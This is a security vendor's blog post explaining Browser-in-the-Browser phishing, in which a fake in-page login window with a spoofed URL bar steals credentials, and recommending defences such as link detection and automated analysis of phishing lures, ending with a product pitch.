In this blog:
- Brief summary of the recent BitB Attacks.
- Details on how what makes BitB attacks hard to detect.
- The risks posed by these kinds of attacks.
- How to best defend against them.
On March 15, 2022, a pen tester with the handle “mr.d0x” published a blog post on his site demonstrating a new credential phishing technique that he called “a Browser in the Browser” (BitB) attack. This attack method gained some notoriety a couple of weeks later when the Ghostwriter campaign (attributed by Mandiant to the Belarussian Ministry of Defense) started using it to target Ukrainians. Beyond these attacks, the BitB attack is a tactic that is likely to become increasingly prominent and be utilized by threat actors setting up credential skimming sites in the near future.
What is a BitB attack – and what makes it effective and hard to detect?
A BitB attack is essentially an in-page window that spoofs a legitimate sign-on service (like Google, Facebook, or Microsoft), and can steal your credentials. In the pen tester’s write-up, “mr.d0x” explains how a malicious actor could script a pop-up on their webpage to appear as though it came from a legitimate login service.
There are two key elements to the way the script is set up. First, the script allows for the window to connect to and display the credential harvesting page from wherever the threat actor may be hosting it. This page can of course be crafted to look almost identical to the legitimate page.
While credential skimming sites built to look like legitimate services is nothing new, what is interesting here is the second element. With a BitB attack, the actor can also spoof the URL bar to appear like it is coming from a legitimate domain. This is possible because what they are displaying is not an actual URL bar, but just some HTML script made to look like one. Since it is not a real URL bar, the actor can write whatever they want there. The end result looks very close to the real thing:
If you look very carefully, you can see some differences between the real and fake URL bars, but these are not easy to spot in the wild (image source: mr.D0x).
How to Defend Against BitB Attacks
Since BitB attacks are based on simple HTML scripts that are not themselves malicious in nature, it is hard to create a technical indicator for BitB attacks that won’t flood you with false positives. Also, since the pages look almost identical to real sign-on pages, training employees to detect this attack method is unlikely to be effective.
Fortunately for defenders, these attacks are part of a larger attack chain that we can disrupt.
Attack chain leading to a BitB attack:
Starting from the front and working back, we just mentioned how the BitB attacks are hard to detect on their own. However, they have to be hosted on a site somewhere – and it is possible that with up to date Link/URL detections that some of these attacks can be caught. Also, the link that the user has to click on to get to the hosting site might look suspicious, raising red flags on the human level and stopping the attack. This gives some hope to defenders, but it is far from a panacea. The site hosting the BitB attack may be too new to have been added to a detection database, or the URL may look convincing enough to click on.
So: we should keep going up the chain.
This brings us to the lure. Something has to lure the victim to click on the link and visit the site hosting the BitB attack in the first place. In most phishing attacks, this tends to be an email message, social media post, or direct message in some other application (such as Slack, LinkedIn, or WhatsApp).
It's here, with the lure, that we can add extra layers of protection in the form of employee education and automated language analysis of incoming messages to the enterprise.
By implementing automated language analysis of the messages that employees are receiving, enterprises can add a key layer of protection.
If companies can automate the monitoring of 100% of employee communications, across all channels – and scan for the common markers of social engineering and phishing tactics – they will make themselves far more secure.
Employee education for identifying phishing attacks should already be standard; this automated language analysis is a key next step. The technology is an emerging one, but it should be central to enterprises defending themselves against the BitB attack.
Incidents like this teach us that companies should be more proactive at protecting their Slack instances. Unfortunately, enterprises often make the mistake of remaining lax with their security, especially with their third-party communication apps. This is a huge oversight.
If you are interested in learning more about the SafeGuard Cyber solution, you can take a quick 5-minute tour.